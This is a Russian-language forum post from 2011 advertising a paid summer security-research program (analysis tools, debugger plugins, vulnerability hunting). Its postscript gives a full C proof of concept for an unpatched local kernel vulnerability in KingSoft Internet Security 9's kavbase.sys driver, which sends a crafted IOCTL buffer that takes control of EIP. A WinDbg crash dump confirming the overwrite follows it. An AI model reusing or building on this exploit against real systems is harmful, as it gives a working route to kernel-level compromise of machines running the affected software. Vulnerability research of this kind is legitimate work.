CISS Hot Summer
От: NTarakanov Россия http://blog.cissrt.com/
Дата: 12.07.11 03:42
Оценка: -1
Всем тем, кому нечего делать летом, и кто хочет получить реальные знания/опыт в сфере ИБ посвящается...

Что из себя предствляет СISS Hot Summer?

Это проект, который продолжается 1 июля до сентября месяца.

В период проведения проекта будут сформулированы задания для каждого участника. Так же, будут назначены кураторы для каждого участника, которые будет отвечать на вопросы участников по заданиям, помогать правильно выбрать алгоритмы решения и всячески способствовать результативной работе участника.
Так же, во время СISS Hot Summer будут проходить online конференции и мастер-классы, основные цели которых повышение уровня, как теоретических, так и практических знаний участников.
Многие студенты, которые будут проходить университетскую практику в CISSRT, тоже могут принять участие в СISS Hot Summer.

Задания будут даваться участникам индивидуально, в процессе обсуждения их интересов.
Участник сам будет выбирать, над каким именно заданием он хочет работать.

Все разработки ведутся по OpenSource методике, авторство кода сохраняется. Участник выбирает лицензию самостоятельно, по его личным предпочтениям(GPLv3, BSD, Apache и т.д.).


Аспекты данной программы – исследование и разработка:

1) Динамический анализ
a. Pin plugins – трассировка, автоматизация детектора уязвимостей и т.д.
b. BitBlaze – работа с Temu, написание плагинов, исследование тейнтирования.

2) Статический анализ — IDA plugins

a.differs: turbodiff, patchdiff, DarunGrim – усовершенствование текущих OpenSource «дифферов»
b. различные "визуализаторы" – прорисовка трасс от различных трассироdщиков(Pin, temu и т.д.), оптимальные пути от точек и т.д.
c.связывание Vine’a с IDA – IDAOCaml

3) Исследование "решателей"Solvers — STP,Z3,SMT и т.д.

4) Исследование отладчиков:
a.плагины к Windbg,
b.плагины к gdb ( Mac OS X, iOS)
c.плагины к Immunity Debugger

5) Поиск уязвимостей, исследование новых векторов атаки:
a.ядро OS — от Windows до Cisco IOS
b.пользовательские приложения

По окончанию проекта, ВСЕ успешно выполненные задания будут вознаграждены денежными призами от 30000 до 100000 рублей.

Все желающие поучаствовать или просто задать интересующий Вас вопрос, пишите на CISSHOTSUMMER@gmail.com.

P.S.
на закуску нульдей в китайском авере:
/*
# Exploit Title: KingSoft Internet Security 9 Plus 0day Local Kernel PoC
# Date: 2011-07-12 
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link: http://www.kingsoftresearch.com/downloads/kis/kis.rar
# Version: up to date kavbase.sys version 2009.6.17.160
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/


#include <windows.h>
#include <stdio.h>
#include <stdlib.h>


#define MALLOCSIZE 0x1000
#define VULNIOCTL 0x20EC

int main(int argc, char **argv)
{
    HANDLE   hDevice;
    DWORD    cb;
    DWORD    *buff;
    char    *buff_out;
    int len = 0;
    DWORD val = 0xDEADBEEF;
    WORD padd= 0x0001;
    int outlen = 0, inlen = 0;
    char deviceName[] = "\\\\.\\kavbase";

    
    if ( (hDevice = CreateFileA(deviceName, 
                          GENERIC_READ|GENERIC_WRITE,
                          0,
                          0,
                          OPEN_EXISTING,
                          0,
                          NULL) ) != INVALID_HANDLE_VALUE )
    {
        printf("Device  succesfully opened %s!\n", deviceName);
    }
    else
    {
        printf("Error: Error opening device \n");
        return 0;
    }
    
    cb = 0;
    buff = (DWORD*)malloc(MALLOCSIZE);
    if(!buff){
      printf("malloc failed");
      return 0;
    }
    memset((char*)buff, 'A', MALLOCSIZE-1);

    buff[0x205] = 0xBBADC0DE;//EIP under our control


    buff_out = (char*)malloc(MALLOCSIZE);
    if(!buff_out){
      printf("malloc failed");
      return 0;
    }
    memset(buff_out, 'B', MALLOCSIZE-1);

    inlen = 0x818;
    outlen = 0x818;
    DeviceIoControl(hDevice, VULNIOCTL, (LPVOID)buff, inlen, (LPVOID)buff_out, outlen, &cb, NULL);

    printf("You wont see this!!!");
    free(buff);
    free(buff_out);
}

и собственно дамп:

*** Fatal System Error: 0x00000050
                       (0xBBADC0DE,0x00000008,0xBBADC0DE,0x00000002)


BugCheck 50, {bbadc0de, 8, bbadc0de, 2}

Probably caused by : hardware

Followup: MachineOwner
---------
 *** Possible invalid call from 80605409 ( nt!ExMapHandleToPointer+0xb1 )
 *** Expected target 8052946a ( nt!RtlWalkFrameChain+0x0 )

nt!RtlpBreakWithStatusInstruction:
80527c0c cc              int     3
kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: bbadc0de, memory referenced.
Arg2: 00000008, value 0 = read operation, 1 = write operation.
Arg3: bbadc0de, If non-zero, the instruction address which referenced the bad memory
    address.
Arg4: 00000002, (reserved)

Debugging Details:
------------------



WRITE_ADDRESS:  bbadc0de Paged session pool

FAULTING_IP: 
+152952f00badfdc
bbadc0de ??              ???

MM_INTERNAL_CODE:  2

DEFAULT_BUCKET_ID:  INTEL_CPU_MICROCODE_ZERO

BUGCHECK_STR:  0x50

PROCESS_NAME:  KingSoft_IS9_poc.exe

TRAP_FRAME:  f4515ba0 -- (.trap 0xfffffffff4515ba0)
ErrCode = 00000010
eax=c0000001 ebx=81d91900 ecx=00000000 edx=f4515b00 esi=81ad4268 edi=81ce89b0
eip=bbadc0de esp=f4515c14 ebp=41414141 iopl=0         nv up ei ng nz ac pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010296
bbadc0de ??              ???
Resetting default scope

LAST_CONTROL_TRANSFER:  from 8060540e to bbadc0de

POSSIBLE_INVALID_CONTROL_TRANSFER:  from 80605409 to 8052946a

STACK_TEXT:  
WARNING: Frame IP not in any known module. Following frames may be wrong.
f4515c10 8060540e 00000818 00000000 81d9d460 0xbbadc0de
f4515c34 804ee129 81d9d3a8 81d91900 806d2070 nt!ExMapHandleToPointer+0xb6
f4515c44 80574e56 81d91970 81ce89b0 81d91900 nt!IopfCallDriver+0x31
f4515c58 80575d11 81d9d3a8 81d91900 81ce89b0 nt!IopSynchronousServiceTail+0x70
f4515d00 8056e57c 000007e8 00000000 00000000 nt!IopXxxControlFile+0x5e7
f4515d34 8053d6d8 000007e8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
f4515d34 7c90e514 000007e8 00000000 00000000 nt!KiFastCallEntry+0xf8
0012ff1c 004099c6 000007e8 000020ec 00344e90 ntdll!KiFastSystemCallRet
0012ff78 0040141e 00000001 00342f90 00342fb0 KingSoft_IS9_poc!main+0x156 
0012ffc0 7c817077 bec19574 01cc4039 7ffd6000 KingSoft_IS9_poc!__tmainCRTStartup+0xfb 
0012fff0 00000000 00401475 00000000 78746341 kernel32!BaseProcessStart+0x23
 
Подождите ...
Wait...
Пока на собственное сообщение не было ответов, его можно удалить.